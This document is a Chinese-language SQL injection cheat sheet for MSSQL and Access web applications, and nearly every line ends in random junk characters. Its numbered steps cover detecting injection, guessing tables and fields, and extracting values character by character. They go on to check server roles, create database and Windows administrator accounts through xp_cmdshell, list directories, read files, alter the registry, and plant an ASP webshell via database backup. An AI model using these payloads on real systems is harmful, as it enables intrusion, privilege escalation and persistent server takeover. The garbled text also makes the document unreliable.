1.判断是否有注入;and 1=1 ;and 1=2 tP%{P"g�3^
2.初步判断是否是mssql ;and user>0 9Xo[(h)�5d
/?1nHBYPM�
3.注入参数是字符'and [查询条件] and ''=' �4�b�E�f
Z)x�aJ�Gbw
4.搜索时没过滤参数的'and [查询条件] and '%25'=' U*P. :B�vG
Ze3X$%kWi�
5.判断数据库系统 W��J9�cZ�L
^3�FE\V/=
;and (select count(*) from sysobjects)>0 mssql �;�/��*�6U
P7f,OY<@%o
;and (select count(*) from msysobjects)>0 access (V%�`k'N7f
FS�b��Hn{@
pdEiq��LhH
_� _>.,gL7
6.猜数据库 ;and (select Count(*) from [数据库名])>0 :4T("a5aM
gOK\�%&S]
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 [e4]�"v`�N
?��
j
9|5*
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 rJInj>�|{=
y� tf b$;|
9.(1)猜字段的ascii值(access) \yGsr Bl
!GQ\"Ufs>�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 O8W7<Wc�|z
awUx=%ERtA
(2)猜字段的ascii值(mssql) =�}:)y�0�L
BMIyskl=i�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 e<#DdpX!H~
N��9<U�jom
10.测试权限结构(mssql) h}Wdh1.M3�
1uk�0d`JL�
�*7�9�m^�
,mL
!(U�S
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- k���%op>
&
v^7�LctcVm
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- EK$K�ee}~�
b2b75�}_�A
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- +�EM_TTf�4
�Y0��5P'Q�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �}/,CbKi,+
on7I�
l���
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �'���2-oh�
��OcSEo7�W
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 6k/�U3�&�R
DK&h
eVIoZ
;and 1=(select IS_MEMBER('db_owner'));-- PSmfiaThwo
0G2g4D�SKD
�Zf>^4_x3P
�KYx�B�VgJ
11.添加mssql和系统的帐户 @i3bgx>_o�
9�r2I�uS�0
;exec master.dbo.sp_addlogin username;-- i�o3yLIy,�
;exec master.dbo.sp_password null,username,password;-- *+b�6B_u]
<p?&�udq�D
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- -sMyt�HH.
8g����>�b
;exec master.dbo.xp_cmdshell 'net user username password ��f0LP?]��
�y9�|K|xO[
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- S-nlr@w8��
:9�|W#d{�o
;exec master.dbo.xp_cmdshell 'net user username password /add';-- CC3v%^81l^
l#wdpD �a{
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- h
!(�>7/Gi
\�M�/6m^zS
$,hwU3RVxc
[��&�q�A\�
12.(1)遍历目录 l~Lb!;�,dN
)2�E%b+�"�
;create table dirs(paths varchar(100), id int) �7a$����G@
U��t)r&��?
;insert dirs exec master.dbo.xp_dirtree 'c:\' 2�_t=P|Uo�
F��Cc=e{��
;and (select top 1 paths from dirs)>0 -6�Mm#s�X�
B )JM%r���
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �k 2%S`/�:
G��8Y+���w
,A5)����<}
%:qoV�0DR�
(2)遍历目录 �|k�{-l!HI
��?J�tg3AY
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- =�qvZpB7ZZ
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ,�`�8�Y8��
�'7i�m����
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 dy�>�|c�j
- n6jG}01b
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 RX2{g^�V7
�s-V���SH
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 fH8�!YQG8$
� [&P��`ak
7nHTlI1�b�
u; �T�vS
|
13.mssql中的存储过程 G7�* h{nE
i3
)x�X@3�
xp_regenumvalues 注册表根键, 子键 v&MU=Tc�qi
G(1 K9{i$�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
�c~dM`2J,
tO���.$+4a
xp_regread 根键,子键,键值名 emA!�Ew(�g
�(�5�uJZ!m
;exec xp_regread $X+��u=�{]
��u:`�y�]�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 oaDsk<(j;R
1ZK�z�umF
xp_regwrite 根键,子键, 值名, 值类型, 值 �
c!uW}U_z
�chAan~r[*
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 M}�.b"
ljZ
=J��|sbY"]
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 <5Mrp"C[i�
}G1&�]Wt_
xp_regdeletevalue 根键,子键,值名 ;~s�r$6���
y>(rZ^�y�&
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 nb@"�?<L!�
�4^!4eyQ�^
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 w&lZ42(mF�
�5su.+4�z\
�f(u&X��uZ
]RFdLV��?�
14.mssql的backup创建webshell g<[rH%\6fg
d�A#�{Cn;�
use model F1A1@{8�bN
�v29G:�YQe
create table cmd(str image); "~p+0Xws�9
G+Dpma� ]�
insert into cmd(str) values (''); �;�WI]�vn�
te2
Iu%5 z
backup database model to disk='c:\l.asp'; '.p?� 6k!K
"j�Zm0U$,*
Qm);6X�
��
��C;�s�gK�
15.mssql内置函数 �Y�lUp�ASW
��S]yvMj_?
;and (select @@version)>0 获得Windows的版本号 #M�i|Iw�L�
4=p@2g2�"H
;and user_name()='dbo' 判断当前系统的连接用户是不是sa }#b
��%"I0
�b4�~H3�|
;and (select user_name())>0 爆当前系统的连接用户 �H,�>�#|F
'H=��we��H
;and (select db_name())>0 得到当前连接的数据库 Gm&2R4�)EP
U4_"aT>M�y
gGK�Ks�&n7
:���z�~!p~
16.简洁的webshell w4:�<fnOM�
\X@�Ik�L$r
use model 56s*A*z$
;
�-fux2?�8M
create table cmd(str image); YID��g'a+z
Uh+jt,RB`�
insert into cmd(str) values (''); dp^N_9$cdO
�v"k�4ATWP
backup database model to disk='g:\wwwtest\l.asp';
